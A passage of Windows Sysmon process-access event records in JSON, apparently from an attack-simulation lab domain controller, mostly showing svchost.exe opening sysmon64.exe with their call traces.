C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3520,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3521,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3522,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3523,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3524,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3525,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3526,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3527,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.513\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010A9500500}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 